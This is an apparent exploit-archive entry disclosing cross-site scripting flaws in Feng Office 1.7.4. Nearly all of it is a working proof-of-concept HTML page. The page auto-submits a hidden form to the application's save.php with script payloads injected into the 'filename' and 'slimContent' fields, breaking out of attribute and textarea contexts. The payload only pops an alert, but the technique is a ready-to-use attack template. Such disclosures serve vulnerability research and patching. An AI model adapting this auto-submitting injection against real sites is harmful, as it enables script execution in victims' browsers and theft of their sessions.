Feng Office 1.7.4 - Cross Site Scripting Vulnerabilities

2014-10-23 18:05:02

Source: http://www.securityfocus.com/bid/47049/info

<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php">
<input type="hidden" name="filename" value=""><script>alert(0)</script>" />
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" />
</form>
</body>
</html>

Fixes

No fixes

In order to submit a new fix you need to be registered.